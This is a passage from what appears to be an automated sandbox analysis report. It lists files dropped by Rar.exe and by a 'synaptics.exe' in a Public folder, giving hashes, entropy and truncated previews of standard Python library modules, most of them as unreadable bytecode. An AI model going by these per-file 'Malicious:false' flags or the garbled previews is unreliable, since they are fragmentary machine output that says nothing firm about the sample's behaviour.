                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7741
                                                                                                                                                                                                                                  Entropy (8bit):4.6850395961561775
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:ocnKpf1Jnkgp9Gw06hznakQ+czXoC/KkWb2z7rKUK4mSaY9wRnKwfRuPKJaR0:ocR6VncLoC/Kk22z7P5Z0RFfO0
                                                                                                                                                                                                                                  MD5:A981793A5C496164DFB5AFC8212CCABE
                                                                                                                                                                                                                                  SHA1:D4309C07CFE248A9725290922937F21363550AE4
                                                                                                                                                                                                                                  SHA-256:EF6D063E7337F6D83FBBB4CA3ADAF321B35CBB3AF736A25D2D637231346E3117
                                                                                                                                                                                                                                  SHA-512:010D2A3AC76A022165E4564CF9A26A3B3324E8585CCCA1C66EE173A4C6A105993FA55B93576B0C48B271C182AC9CE87BD3CE7441CD76E2B19DE0C1907147379D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import contextlib..import os..import pathlib..import shutil..import stat..import sys..import zipfile....__all__ = ['ZipAppError', 'create_archive', 'get_interpreter']......# The __main__.py used if the users specifies "-m module:fn"...# Note that this will always be written as UTF-8 (module and..# function names can be non-ASCII in Python 3)...# We add a coding cookie even though UTF-8 is the default in Python 3..# because the resulting archive may be intended to be run under Python 2...MAIN_TEMPLATE = """\..# -*- coding: utf-8 -*-..import {module}..{module}.{fn}().."""......# The Windows launcher defaults to UTF-8 when parsing shebang lines if the..# file has no BOM. So use UTF-8 on Windows...# On Unix, use the filesystem encoding...if sys.platform.startswith('win'):.. shebang_encoding = 'utf-8'..else:.. shebang_encoding = sys.getfilesystemencoding()......class ZipAppError(ValueError):.. pass......@contextlib.contextmanager..def _maybe_open(archive, mode):.. if isinstance(
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):91926
                                                                                                                                                                                                                                  Entropy (8bit):4.530877476231924
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:A6wB2cR7Tt7+IQOU+OnDKHnCrYYs+NocBa0q8Y:A6Ud+I9U+OnDKHCrRO8Y
                                                                                                                                                                                                                                  MD5:5AB203B50E60C14191FC1EED8A6DC2F9
                                                                                                                                                                                                                                  SHA1:44C4518C0971E7858CA45F50347820177964971E
                                                                                                                                                                                                                                  SHA-256:2E155CDE604896D9903A4C529B89FA768E75F6E17FB7A60DB0AC2190B0B34456
                                                                                                                                                                                                                                  SHA-512:A7ED4066F7FA40161E34B390C62FC9AB7B4E2EC784A9AF96C7A10F32C5D01419B5134C8639EDD1858D9C4876A2752A1863DC798BD9011ED04D6E3983263C0A4A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""..Read and write ZIP files.....XXX references to utf-8 need further investigation..."""..import binascii..import importlib.util..import io..import itertools..import os..import posixpath..import shutil..import stat..import struct..import sys..import threading..import time..import contextlib..import pathlib....try:.. import zlib # We may need its compression method.. crc32 = zlib.crc32..except ImportError:.. zlib = None.. crc32 = binascii.crc32....try:.. import bz2 # We may need its compression method..except ImportError:.. bz2 = None....try:.. import lzma # We may need its compression method..except ImportError:.. lzma = None....__all__ = ["BadZipFile", "BadZipfile", "error",.. "ZIP_STORED", "ZIP_DEFLATED", "ZIP_BZIP2", "ZIP_LZMA",.. "is_zipfile", "ZipInfo", "ZipFile", "PyZipFile", "LargeZipFile",.. "Path"]....class BadZipFile(Exception):.. pass......class LargeZipFile(Exception):.. """.. Raised when writing a zipfile, th
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):31670
                                                                                                                                                                                                                                  Entropy (8bit):4.640811570675585
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:lO/4o/ka5N9a5LL5pEveF+SS6s5Ag0k6BX8BpL:lOZ/XugefS6aAg04
                                                                                                                                                                                                                                  MD5:C35072F99E2CD83443AC1DB234B1716D
                                                                                                                                                                                                                                  SHA1:68DD726663BBE88215BFC5BF122FB82B7DE83592
                                                                                                                                                                                                                                  SHA-256:52580EB9D1D0607A5139EA2E6EC847CFB5DA30C37F1462E5072C960287A547E2
                                                                                                                                                                                                                                  SHA-512:BAD94CDC61C314DDF965C07A98304ACED800FFFA3BA5E10E32650CB026F8BDCF1F2B9A064A2C319AF7DCF3C25C09018663ABD136E16256F6736E991243636B37
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""zipimport provides support for importing Python modules from Zip archives.....This module exports three objects:..- zipimporter: a class; its constructor takes a path to a Zip archive...- ZipImportError: exception raised by zipimporter objects. It's a.. subclass of ImportError, so it can be caught as ImportError, too...- _zip_directory_cache: a dict, mapping archive paths to zip directory.. info dicts, as used in zipimporter._files.....It is usually not needed to use the zipimport module explicitly; it is..used by the builtin import mechanism for sys.path items that are paths..to Zip archives..."""....#from importlib import _bootstrap_external..#from importlib import _bootstrap # for _verbose_message..import _frozen_importlib_external as _bootstrap_external..from _frozen_importlib_external import _unpack_uint16, _unpack_uint32..import _frozen_importlib as _bootstrap # for _verbose_message..import _imp # for check_hash_based_pycs..import _io # for open..import marshal # for lo
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4142
                                                                                                                                                                                                                                  Entropy (8bit):5.362666268605498
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:zgdNzUuGd+P2sKNUWhom2j8kQAnPPELBG0uY:q4BRRhom1gPG00uY
                                                                                                                                                                                                                                  MD5:0DDBE37617EEA523BFBDFFC54DBA6B07
                                                                                                                                                                                                                                  SHA1:E40687473A48832B5478222F718A18B38F96F218
                                                                                                                                                                                                                                  SHA-256:AB7FA314B7816909769CB4ECA4352D0A4294C8B2C997D708545A782E9E19BD6F
                                                                                                                                                                                                                                  SHA-512:B2565EA039018DB3BD7F2E293394D6AB0952B7DFE44742164C40CE003ED49E490EDAC597104160F6D23BF6D6E5858DA095E1C82DEA2C0921C91FF1745601CF42
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.Z.g.d...Z.d.g.e...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.G.d.d...d...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.d.S.).an...Record of phased-in incompatible language changes...Each line is of the form:.. FeatureName = "_Feature(" OptionalRelease "," MandatoryRelease ",". CompilerFlag ")"..where, normally, OptionalRelease < MandatoryRelease, and both are 5-tuples.of the same form as sys.version_info:.. (PY_MAJOR_VERSION, # the 2 in 2.1.0a3; an int. PY_MINOR_VERSION, # the 1; an int. PY_MICRO_VERSION, # the 0; an int. PY_RELEASE_LEVEL, # "alpha", "beta", "candidate" or "final"; string. PY_RELEASE_SERIAL # the 3; an int. )..OptionalRelease records the first release in which.. from __future__ import FeatureName..was accepted...In the case of MandatoryReleases that have not yet occurred,.MandatoryRelease pre
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):32936
                                                                                                                                                                                                                                  Entropy (8bit):5.03513700995287
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:WpD38l+6pg6mG5JlooICwimTmIufuBEQtJHVDOA/8AH:usl+VVSooICwimT3ufu+AJ1DOcvH
                                                                                                                                                                                                                                  MD5:BC0C6A46BF4F7E85508E0C3B2F20A626
                                                                                                                                                                                                                                  SHA1:A95BFDF351823DE14F877A3AEF05221BA9817367
                                                                                                                                                                                                                                  SHA-256:701EB46C5709F7F330E9BDFBBEB7AC87E2E3AA5B3EB59C5B0208318473925419
                                                                                                                                                                                                                                  SHA-512:74878FC13AA4A06D309325B46BD4B98AE07E6D8B27D69CFB710773B147CC49BE9136A7C3455A77C304E69DAD0A1034CE0DE6692A3FC4A4C3B3161992F5D73335
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Z*e*..Z*e.e*..Z+e*.,....[*d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d*..d*e8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF.3e(....G.dAdB..dBe;..ZGG.dCdD..dDeGeC..ZHeH.3e$..
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4523
                                                                                                                                                                                                                                  Entropy (8bit):5.142477077602006
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:inAZIr5wc+SHmtPK4Q9XEf9j0K5ULIPmwPu7gKxNW4q4RqOJd0f:iNsByEeIOQCxNWQRqOT0f
                                                                                                                                                                                                                                  MD5:6D6822CD0E49905033E0CB505877C076
                                                                                                                                                                                                                                  SHA1:316DB01074EBE83FE18F607A9F36A1A2C2702964
                                                                                                                                                                                                                                  SHA-256:152E5F5A40EAFF9766106876D18B93A504B7690F4079ACE59106367609F652AD
                                                                                                                                                                                                                                  SHA-512:1983CB7AFEB80D519B4EC6EEF616308DAC521C5E85149D502EBB0A5D1CA0AEEC2A45A040A0F388C2F3415452EEFF8E8D71BDBB88B4D40CEB8409089FE4EE6F51
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...sB...d.Z.d.d.l.Z.d.d.l.Z.e.j.Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.d.S.).z7Internal classes used by the gzip, lzma and bz2 modules.....Nc....................@...s0...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...BaseStreamz.Mode-checking helper functions.c....................C...s....|.j.r.t.d.....d.S.).Nz.I/O operation on closed file)...closed..ValueError....self..r......C:\Users\Public\M20EKMMEH2\lib\_compression.py.._check_not_closed....s..........z.BaseStream._check_not_closedc....................C........|.....s.t...d.....d.S.).Nz.File not open for reading)...readable..io..UnsupportedOperationr....r....r....r......_check_can_read...............z.BaseStream._check_can_readc....................C...r....).Nz.File not open for writing)...writabler....r....r....r....r....r......_check_can_write....r....z.BaseStream._check_can_writec....................C...s(...|.....s.t...d.....|.....s.t...d.....d.S.).Nz3Seeking is only supported on files
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3558
                                                                                                                                                                                                                                  Entropy (8bit):5.077510108533416
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:PLsOn3xh9/uydg7ls3pl+ltJ5+XdaCjteUzCt/BHKGZEIy0EEt:PLs8xfcls3plwtJEXdaIeUzMJty0EG
                                                                                                                                                                                                                                  MD5:C9347D770AB8BF731C342C4A55B43B32
                                                                                                                                                                                                                                  SHA1:5B7A552DA518AF40E5F4F82EBB81A408CB73297E
                                                                                                                                                                                                                                  SHA-256:A53D5417477F63F195D06B0C07DB9564CAEA804842B80F012050CA5BFCB3CD4B
                                                                                                                                                                                                                                  SHA-512:FAED6E8D2D44E678D13795A7EEE18AD7961FCED8B657F5F40EA3DD1D5AEA3EE07622354557E540D192AE0CD34F9586DC4414163FD1514A11CEF7E3336B46CC3C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s@...d.Z.d.d.l.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).z=.The objects used by the site module to add custom builtins.......Nc....................@...s&...e.Z.d.Z.d.d...Z.d.d...Z.d.d.d...Z.d.S.)...Quitterc....................C...s....|.|._.|.|._.d.S...N....name..eof)...selfr....r......r...../C:\Users\Public\M20EKMMEH2\lib\_sitebuiltins.py..__init__....s........z.Quitter.__init__c....................C...s....d.|.j.|.j.f...S.).Nz.Use %s() or %s to exitr......r....r....r....r......__repr__....s......z.Quitter.__repr__Nc....................C...s&...z.t.j.......W.t.|...........Y.t.|.....r....)...sys..stdin..close..SystemExit).r......coder....r....r......__call__....s................z.Quitter.__call__r....)...__name__..__module__..__qualname__r....r....r....r....r....r....r....r........s............r....c....................@...s6...e.Z.d.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)..._Printerzninteractive prompt objects for printi
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7619
                                                                                                                                                                                                                                  Entropy (8bit):4.617874922906838
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:6oLAmOjav3ze0qLnKFHWpLiEEskjXoNizmM8+WsxL13vbRJv4ZO1VAUV0KcyyYTT:3LAbj236LTKF2pLiE3kjXoEzml+WsxL3
                                                                                                                                                                                                                                  MD5:89B404C8BC522D584108A40D1727E0B8
                                                                                                                                                                                                                                  SHA1:67B3D39D6158FB51C6730B63A5B87B5D73CF2EDD
                                                                                                                                                                                                                                  SHA-256:C38CFD14088A90D1D84295C9A2034A976BA5E54694C4EBEE357443D5F43448E2
                                                                                                                                                                                                                                  SHA-512:0FD549E0D9027D6FD96D45911A736BEF599561212E32170EBD5DD77BC811E1CDE44BC072C214B6150CFBE8D6D2677E25C9E35B6C1D8C9296774F10DCC731AEAC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s>...d.d.l.m.Z...d.d.l.m.Z...d.g.Z.G.d.d...d...Z.G.d.d...d...Z.d.S.)..........ref)...Generiuseras..WeakSetc....................@...s$...e.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.S.)..._IterationGuardc....................C...s....t.|...|._.d.S...N).r......weakcontainer)...selfr......r.....-C:\Users\Public\M20EKMMEH2\lib\_weakrefset.py..__init__....s......z._IterationGuard.__init__c....................C...s ...|.....}.|.d.u.r.|.j...|.....|.S.r....).r......_iterating..add).r......wr....r....r......__enter__....s............z._IterationGuard.__enter__c....................C...s8...|.....}.|.d.u.r.|.j.}.|...|.....|.s.|.......d.S.d.S.d.S.r....).r....r......remove.._commit_removals).r......e..t..br......sr....r....r......__exit__....s....................z._IterationGuard.__exit__N)...__name__..__module__..__qualname__r....r....r....r....r....r....r....r........s............r....c....................@...s&...e.Z.d.Z.d@d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6762
                                                                                                                                                                                                                                  Entropy (8bit):5.125610687184022
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:ic2+dPAM6MGWUls1p2N8R6Diag2z9o2Ue4loXLk5ebUtoH:j2+dPUMGxYtag2VXLk5ewc
                                                                                                                                                                                                                                  MD5:763E2FE5E88F2B81404CD4F3643A8209
                                                                                                                                                                                                                                  SHA1:90860241BAAB178D13BC3E210CEBC57B40E1E1C7
                                                                                                                                                                                                                                  SHA-256:F46D663E2B53C06AE3F58088C6A91242182F28912D53803B1066C77209A3A5B6
                                                                                                                                                                                                                                  SHA-512:3570512A41F09F308BF94FE39C877A3EAD1AB25BA6D36E430B26AE185DBA15C19E470927D7CB9DDF8E119AD6E160ED89AC65779A2FCBE23C9383A1DB381B86B8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d6........................@...s....d.Z.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...W.n...e.yH......d.d.l.m.Z.m.Z...d.e._.Y.n.w.G.d.d...d.e...Z.d.d...Z.G.d.d...d.e.d...Z.d.S.).z3Abstract Base Classes (ABCs) according to PEP 3119.c....................C...s....d.|._.|.S.).a<...A decorator indicating abstract methods... Requires that the metaclass is ABCMeta or derived from it. A. class that has a metaclass derived from ABCMeta cannot be. instantiated unless all of its abstract methods are overridden.. The abstract methods can be called using any of the normal. 'super' call mechanisms. abstractmethod() may be used to declare. abstract methods for properties and descriptors... Usage:.. class C(metaclass=ABCMeta):. @abstractmethod. def my_abstract_method(self, ...):. .... T)...__isabstractmethod__).Z.funcobj..r.....%C:\Users\Public\M20EKMMEH2\lib\abc.py..abst
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):17173
                                                                                                                                                                                                                                  Entropy (8bit):5.499366955795983
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:KZvQ18ayn9wBqXa71hITEetuAk8M77m2n9t/MRWFA3CTDTIzuQc4bimd3c6tV3:47ay9wgq71hITuDyq9PXT4uQuI3htV3
                                                                                                                                                                                                                                  MD5:DEBA26302AF9D6F4064960D897C8EE75
                                                                                                                                                                                                                                  SHA1:743D01CAAB7D17ACE31EC18D8C8A0B7170B6E495
                                                                                                                                                                                                                                  SHA-256:A051DC7EC3A79AE6C8F3A31EFCBB8A7CB328F49CA9F8F000CCB0EBF4C79DF02B
                                                                                                                                                                                                                                  SHA-512:3C26445CFB4406996F0F2BA1A1A84735344069F57E23214A439DCAF2F64ABA1C54343E22AD09401ABE8D1DEF79BE5AE6CEAA2930A8D48D8AB4E1B40771E8C2FF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.S.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.e.e.f.Z.d.d...Z.dQd.d...Z.dRd.d...Z.d.d...Z.d.d...Z.e...d.d...Z.e...d.d...Z.d.d...Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.i.a.i.a.d.d...Z.dSd.d...Z.d.d...Z.e.j.d d!..e._.dSd"d#..Z.e.j.d e.d$..e._.d%d&..Z.e.j.d'd!..e._.dTd(d)..Z.e.j.d'd*d$..e._.d+d,..Z dTd-d...Z!d.a"d.a#d/Z$d0Z%dUd1d2..Z&d.d.d.d.d3..d4d5..Z'd.d.d6d7..d8d9..Z(d:Z)d.a*d.a+d.a,dTd;d<..Z-d=d>..Z.d?Z/e/d@..dA..Z0dBdC..Z1dDdE..Z2dFdG..Z3dHdI..Z4dJdK..Z5dLdM..Z6dNdO..Z7e8dPk.r.e6....d.S.d.S.)VzDBase16, Base32, Base64 (RFC 3548), Base85 and Ascii85 data encodings.....N)...encode..decode..encodebytes..decodebytes..b64encode..b64decode..b32encode..b32decode..b32hexencode..b32hexdecode..b16encode..b16decode..b85encode..b85decode..a85encode..a85decode..standard_b64encode..standard_b64decode..urlsafe_b64encode..urlsafe_b64decodec....................C...sl...t.|.t...r.z.|...d...W.S...t.y.......t.d.....w.t.|.t...r.|.S.z.t.|.......W.S...t.y5......t.d.|.j.j.....d...
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2599
                                                                                                                                                                                                                                  Entropy (8bit):5.221183447947155
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:TChwHaPJ7Bn7V3lvEOCl7VU3OpOBn7B3wCLnCRl7VC39eV:TCh7Bx3lEOC03OpOB93wGCRi34V
                                                                                                                                                                                                                                  MD5:89295929C44B04D07432A8CAFE010C97
                                                                                                                                                                                                                                  SHA1:3022462EB2B49D4E44605EFFDFAEA187A9EDAB06
                                                                                                                                                                                                                                  SHA-256:F5FBE6423676A0888FEE0EED036491C7C83B4B244CCF07116F4C728B9F38B32B
                                                                                                                                                                                                                                  SHA-512:37B83EB981074F774F7061E9E4BFF8A704873371EEBA5057CB2B9CD74B66439EB9DADBE40A8A08C74A2EA674845D2C72EEA2D83713D81542F2CC2F79FAA0116C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...sp...d.Z.d.d.d...d.d...Z.d.d.d...d.d...Z.d.d.d...d.d...Z.d.d.d...d.d...Z.z.d.d.l.T.W.n...e.y1......Y.n.w.e.Z.e.Z.d.S.).z.Bisection algorithms......N....keyc....................C....>...|.d.u.r.t.|.|.|.|...}.n.t.|.|.|...|.|.|.d...}.|...|.|.....d.S.).z.Insert item x in list a, and keep it sorted assuming a is sorted... If x is already in a, insert it to the right of the rightmost x... Optional args lo (default 0) and hi (default len(a)) bound the. slice of a to be searched.. Nr....)...bisect_right..insert....a..x..lo..hir......r.....(C:\Users\Public\M20EKMMEH2\lib\bisect.py..insort_right....s............r....c....................C...s....|.d.k.r.t.d.....|.d.u.r.t.|...}.|.d.u.r1|.|.k.r/|.|...d...}.|.|.|...k.r'|.}.n.|.d...}.|.|.k.s.|.S.|.|.k.rN|.|...d...}.|.|.|.|.....k.rF|.}.n.|.d...}.|.|.k.s5|.S.).a....Return the index where to insert item x in list a, assuming a is sorted... The return value i is such that all e in a[:i] have e <= x
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10881
                                                                                                                                                                                                                                  Entropy (8bit):5.274572210914015
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:66Eb2RLORaQHzW6FVoDCGEUPIzSh/NHSN:3RLORLpGPIzG/NyN
                                                                                                                                                                                                                                  MD5:347438C098A507697BEDAD93DA2CB575
                                                                                                                                                                                                                                  SHA1:7F8C64EF2C79A0112E4D82051D1AA73A2C79D73B
                                                                                                                                                                                                                                  SHA-256:2E349AB7AC287AD0127518B1F009BA6F35AF2885F204BFDDDE08D36DA370DFE7
                                                                                                                                                                                                                                  SHA-512:D4C1767694EEDAB3F9EA0FFCF49F9941B80CE08B8259A42D398405226C43F7C471ACFB65BA170BDDCB9AA330971BD5D00A617E7A2AB8E9DA084DFD91CF649329
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d./.......................@...s....d.Z.g.d...Z.d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.Z.d.Z.d.Z.G.d.d...d.e.j...Z.....d.d.d...Z.d.d.d...Z.d.d...Z.d.S.).z.Interface to the libbzip2 compression library...This module provides a file interface, classes for incremental.(de)compression, and functions for one-shot (de)compression..)...BZ2File..BZ2Compressor..BZ2Decompressor..open..compress..decompressz%Nadeem Vawda <nadeem.vawda@gmail.com>.....).r....N).r....r..............c....................@...s....e.Z.d.Z.d.Z.d*d.d...d.d...Z.d.d...Z.e.d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d+d.d...Z.d,d.d...Z.d,d.d...Z.d.d...Z.d,d.d...Z.d,d.d ..Z.d!d"..Z.d#d$..Z.e.j.f.d%d&..Z.d'd(..Z.d)S.)-r....a@...A file object providing transparent bzip2 (de)compression... A BZ2File can act as a wrapper for an existing file object, or refer. directly to a named file on disk... Note that BZ2File provides a *binary* file interface - data read is. returned as bytes, and data t
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):26314
                                                                                                                                                                                                                                  Entropy (8bit):5.231812180815295
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:qkfNsz3TQClly8bR9PS3q4Rh1mcMjscr3KLr:qwmHS3qF2i3KLr
                                                                                                                                                                                                                                  MD5:91EF10A8B7A81BBF17784470B22C88B5
                                                                                                                                                                                                                                  SHA1:EB36374EE85BA20998194049BF6C53126863AE31
                                                                                                                                                                                                                                  SHA-256:19C84BCD637AB47E5EEE76B3A3AE81D4751F9C300A3AA1830ED1EC58AE21DA87
                                                                                                                                                                                                                                  SHA-512:993A54F7924125AE4938E54D2534439F850326F6941F2F5F996C6E2FBC83E9C3528C8C2F2F22DDAF1A1B7F3C49EDAB5D7AF2CFB5C38D2936E95A97FF68833AB8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.b.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...g.d...Z.e.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.Z.d.Z.g.d...Z.G.d.d...d...Z.G.d.d...d...Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z.e.d...\.Z.Z.Z.Z.Z.Z.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z d.d...Z!d.d ..Z"d!d"..Z#G.d#d$..d$e$..Z%G.d%d&..d&e%..Z&G.d'd(..d(e%..Z'G.d)d*..d*..Z(G.d+d,..d,e&..Z)G.d-d...d.e'..Z*e&..Z+e+j,Z-d/d0..Z.e+j/Z0e+j1Z1e+j2Z3e+j4Z5e+j6Z6e+j7Z8e+j9Z:e+j;Z<d1Z=d2Z>e=e>f.d3d4..Z?e=e>f.d5d6..Z@d7ZAe..BeAd.d....C..ZDd8d9..ZEd:d;..ZFeGd<k.r.eFe.jH....d.S.d.S.)=a$...Calendar printing functions..Note when comparing these calendars to the ones printed by cal(1): By.default, these calendars have Monday as the first day of the week, and.Sunday as the last (the European convention). Use setfirstweekday() to.set the first day of the week (0=Monday, 6=Sunday)......N)...repeat)...IllegalMonthError..IllegalWeekdayError..setfirstweekday..firstweekday..isleap..leapdays..weekday..monthrange..monthcalendar..prmonth..m
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):33230
                                                                                                                                                                                                                                  Entropy (8bit):5.022055991140742
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:58/o6wZxokNQceWYXgYD7msLySGRbmOZwENNflPKPBxKa:5OUkFrOZwENNflPKPBxKa
                                                                                                                                                                                                                                  MD5:E34B4EC4C0BF2FF16A996FB3FC9370E4
                                                                                                                                                                                                                                  SHA1:F76EAB91BF6A85234C8D4CCF7AB5F4C6BF84C58D
                                                                                                                                                                                                                                  SHA-256:D04C8D28A3269A0692923149C22FC17E70C7F3833FED9B1B73CF69E32527F276
                                                                                                                                                                                                                                  SHA-512:113FA6497E5CD3B9D397A113EB69135915D34F64AD6B64EBC2EA23CC59DD757C0A767D859C8E4DA69BA3282AC0D6AFAA50A13CA1EE4C03149D8D3409156A05E6
                                                                                                                                                                                                                                  Malicious:false
